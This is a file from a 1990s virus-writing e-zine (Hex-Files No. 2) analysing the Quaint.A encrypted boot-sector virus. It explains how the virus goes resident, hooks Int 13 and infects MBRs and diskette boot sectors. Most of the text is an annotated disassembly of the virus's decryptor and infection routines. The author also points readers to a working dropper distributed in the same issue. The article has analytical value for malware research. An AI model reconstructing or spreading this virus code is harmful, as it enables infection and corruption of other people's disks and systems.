Copy Link
Add to Bookmark
Report
Hexfiles Issue 2 File 012
HEX-FILES No. 2 File 012
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Virus Name: Quaint.A
This is the virus that is currently going the rounds of Metro Manila
and nearby provinces. As McAfee, the AV of choice hereabouts, is not
yet able to detect it, it may already have reached the southern
islands and provinces of our archipelagic nation. And, probably other
countries as well. You know how fast boot infectors are.
Quaint is an encrypted virus infecting the boot sector of diskettes
and mbr of hard disks. One thing of interest about this virus is that
it checks the sector where it saves the original boot sector or mbr
for itself. This is in addition to the usual infection check of the
boot sector or mbr. It is partially stealth, if you stretch the term
a bit . It is not stealth in the true sense of the word.
There are already two variants reported in the wild -- Quaint.A and
Quaint.B. The documentation of DisCoVir stated that the two variants
differ only in the way they are encrypted. That is, they use
different decryptors but what is hidden by the encryption is the
same. Although, because I only have Quaint.A in my collection, I
could not verify this.
HOW THE VIRUS WORKS
~~~~~~~~~~~~~~~~~~~
Keywords used in this article
=============================
LocationSavedBootSector is the sector where the original boot
sector or mbr is saved by the virus.
BootSector is track 0 head 0 sector 1, which is the mbr in hard
disks and boot sector in diskettes.
Keyword[n1..n2] is offset n1 to offset n2 of Keyword, for example,
LocationSavedBootSector[0..1] or BootSector[1fe..1ff]
Residency
=========
It decreases memory by 1K ( [0:413]-1 ) and converts this to
segment. It hooks Int 13 and saves the vector. The virus code is
copied to the top of memory and is then executed from there. It
reads the infected boot sector or mbr, as the case may be, and
saves it. Because it does not have an encryption routine, this
ensures the perpetuation of the virus in encrypted form.
It reads LocationSavedBootSector to 0:7c00 and executes it,
continuing the boot process.
Infection
=========
It infects on read (13/02 and 13/0a) of BootSector. It determines
the object is a hard disk if the sign bit of dl is set. Therefore,
it is able to infect mbr of all installed hard disks.
It considers a disk infected if BootSector[0..1] = eb 3e. But
before that, it checks if LocationSavedBootSector[1fe..1ff] = 55
aa, which means that it might have already infected the disk
(verified by BootSector[0..1] = eb 3e) or another virus is also
using that sector. If LocationSavedBootSector[1fe..1ff] <> 55 aa,
the disk is considered uninfected.
If it finds itself in LocationSavedBootSector (true if
LocationSavedBootSector[0..1] = eb 3e), it saves the current
content of BootSector to LocationSavedBootSector and reinfects the
disk. Note, however, that it only checks for itself in
LocationSavedBootSector if it is not present in BootSector.
It does not infect disks if BootSector[1fe..1ff] <> 55 aa.
The original mbr is saved at track 0 head 0 sector 2 and the
original boot sector at the last sector of the root directory.
LocationSavedBootSector in diskettes is determined based on the
content of the bpb.
It uses the encrypted virus it previously saved to infect the
mbr/boot sector.
Before returning to the program that made the interrupt call, it
returns the content of LocationSavedBootSector to the calling
program. This is only done after it infects a disk. This is the
closest the virus gets to being called a stealth virus.
Disassembly
===========
The following disassembly is not meant to be compiled. If you want
to get a copy of the virus, use the Quaint dropper in this issue.
This disassembly was created using debug.exe of dos.
ÄÄ QUAINT.A DISASSEMBLY STARTS ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;---------------------------------------------------------------
7c00 jmp 7c40 ; virus boot sector entry
;---------------------------------------------------------------
;
; This is the decryptor of the virus.
; I retained the offset of the executing boot sector for clarity
;
; It is probable that the virus used a virus construction
; tool/encryption engine to encrypt the virus.
;
;---------------------------------------------------------------
7c40 mov ax,af3e
7c43 xor ax,6576
7c46 add ax,347c
7c49 xchg bp,ax
7c4a mov di,008b
7c4d mov cx,bp
7c4f rol di,cl
7c51 mov bx,di
7c53 mov di,cs:[bp+7dbc]
7c58 add di,bx
7c5a mov cs:[bp+7dbc],di
7c5f mov si,bp
7c61 mov bx,si
7c63 sub bx,ac24
7c67 mov cl,07
7c69 ror bx,cl
7c6b mov bp,bx
7c6d mov bx,bp
7c6f mov cl,07
7c71 rol bx,cl
7c73 add bx,ac26
7c77 mov bp,bx
7c79 jnz 7c4a
;---------------------------------------------------------------
;
; Start of main virus code.
;
; This is executed right after decryption.
;
; Initialization phase of the virus.
;
;---------------------------------------------------------------
0000 pop si
0001 xor ax,ax
0003 mov ds,ax
0005 dec word ptr [0413] ; decrease memory by 1K
0009 mov bp,[0413]
000d mov cl,06
000f shl bp,cl ; and convert to segment
0011 mov es,bp
0013 xor di,di
;-------------------------------------------------
0015 mov ax,008f ;
0018 xchg ax,[di+4c] ; hook int 13
001b xchg bp,[di+4e] ;
;-------------------------------------------------
001e cld ;
001f mov cx,0122 ; copy virus to top of memory
0022 repz ;
0023 movsb ;
;-------------------------------------------------
0024 stosw ;
0025 xchg bp,ax ; save int 13 vector
0026 stosw ;
;-------------------------------------------------
0027 mov bp,002d
002a push es
002b push bp
002c retf
;-------------------------------------------------
002d mov bx,di ; read BootSector = get an
002f call 004b ; encrypted copy of the virus
;-------------------------------------------------
0032 push ds ;
0033 pop es ; read LocationSavedBootSector
0034 mov bx,7c00 ; to 0:7c00
0037 push es ;
0038 push bx ;
0039 xor ah,ah ;
003b int 13 ;
003d call 0052 ;
0040 jb 0039 ;
;-------------------------------------------------
0042 retf ; continue boot process
;---------------------------------------------------------------
;
; Multiple entry routine to call int 13
;
;---------------------------------------------------------------
0043 call 005e ; entry for write to
; LocationSavedBootSector
;-------------------------------------------------
0046 mov ax,0301 ; entry for write to
0049 jmp 0058 ; BootSector
;-------------------------------------------------
004b xor dh,dh ; entry for read BootSector
004d mov cx,0001 ;
0050 jmp 0055 ;
;-------------------------------------------------
0052 call 005e ; entry for read
; LocationSavedBootSector
0055 mov ax,0201 ;
;-------------------------------------------------
0058 pushf ; generic entry to call
0059 push cs ; int 13
005a call 0121 ;
005d ret ;
;---------------------------------------------------------------
;
; Routine to determine LocationSavedBootSector
; On return, dh = head, ch = track, cl = sector
;
;---------------------------------------------------------------
005e xor dh,dh ; set up for hard disk
0060 mov cx,0002 ; track 0 head 0 sector 2
0063 test dl,dl
0065 js 008e ; is it a hard disk?
;-------------------------------------------------
; determine LocationSavedBootSector for diskettes
;-------------------------------------------------
0067 mov al,[bx+10] ; number of fat copies
006a cbw
006b push dx
006c mul word ptr [bx+16] ; sectors per fat
006f add ax,[bx+0e] ; number of reserved sectors
0072 xchg dx,ax
0073 mov ax,[bx+11] ; max number root dir entries
0076 dec ax
0077 mov cl,04
0079 shr ax,cl
007b add ax,dx
007d cwd
007e div word ptr [bx+18] ; sectors per track
0081 mov cl,dl
0083 cwd
0084 div word ptr [bx+1a] ; number of heads
0087 inc cx
0088 mov ch,al
008a pop ax
008b mov ah,dl
008d xchg dx,ax
008e ret
;---------------------------------------------------------------
;
; Int 13 handler of the virus
;
;---------------------------------------------------------------
008f cmp ah,02 ;
0092 jz 0099 ; infects only on read
0094 cmp ah,0a ;
0097 jnz 00a0 ; --------------- of
0099 test dh,dh ; head 0
009b jnz 00a0 ;
009d cmp cx,+01 ; track 0 sector 1
00a0 jnz 0121 ;
;-------------------------------------------------
00a2 call 0058 ; execute read
00a5 jb 011d
;-------------------------------------------------
00a7 push ds ; save registers
00a8 push di
00a9 push si
00aa push dx
00ab push cx
00ac push ax
00ad cld
00ae push es
00af pop ds
;-------------------------------------------------
00b0 call 005e ; get LocationSavedBootSector
;-------------------------------------------------
00b3 jns 00c9 ; if diskette, skip partition
; table check
;-------------------------------------------------
00b5 mov di,ffc0 ;
00b8 cmp [bx+di+01ff],dh ; sorry but I don't have any
00bc jnz 00c4 ; idea what this partition
00be cmp [bx+di+0200],cx ; table check is all about.
00c2 jz 0117 ;
00c4 add di,+10 ; Does somebody want to explain
00c7 jnz 00b8 ; this to me?
;-------------------------------------------------
; infection checks
;-------------------------------------------------
00c9 mov si,[bx] ; save BootSector[0..1]
00cb call 0055
00ce jb 00fa
00d0 mov di,aa55
00d3 xor di,[bx+01fe] ; LocationSavedBootSector[1fe..]
00d7 jnz 00e5
00d9 mov ax,3eeb
00dc cmp si,ax
00de jz 0117
00e0 cmp [bx],ax ; LocationSavedBootSector[0..1]
00e2 jnz 00e5
00e4 inc di
00e5 call 004b ; read BootSector again
00e8 jb 0117
00ea cmp word ptr [bx+01fe],aa55 ;BootSector[1fe..1ff] = 55 aa ?
00f0 clc
00f1 jnz 0117
00f3 test di,di
00f5 jz 00fd
00f7 call 0043 ; write to LocationSavedBootSector
00fa cmc
00fb jnb 0117
00fd mov si,0166 ; use encrypted virus to infect
0100 lea di,[bx+40]
0103 mov cx,00be
0106 cli
0107 repz
0108 cs:
0109 movsw
010a mov word ptr [bx],3eeb ; set virus BootSector[0..1]
010e xor dh,dh
0110 inc cx
0111 call 0046 ; write to BootSector
0114 call 0052 ; read LocationSavedBootSector
;-------------------------------------------------
0117 pop ax ; restore registers
0118 pop cx
0119 pop dx
011a pop si
011b pop di
011c pop ds
011d sti
;-------------------------------------------------
011e retf 0002 ; return to int 13 caller
;-------------------------------------------------
0121 jmp f000:ec59 ; jump to old int 13 handler
;---------------------------------------------------------------
;
; The encrypted virus is saved starting here
;
;---------------------------------------------------------------
ÄÄ QUAINT.A DISASSEMBLY ENDS ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
EoF.